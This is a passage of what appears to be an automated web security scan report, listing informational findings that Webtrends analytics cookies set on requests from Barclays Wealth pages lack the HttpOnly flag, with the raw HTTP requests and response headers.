14.177. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f0088adcd; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.178. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:51 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320333bd69; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; Expires=Sun, 01-Jan-2012 00:29:51 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.179. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

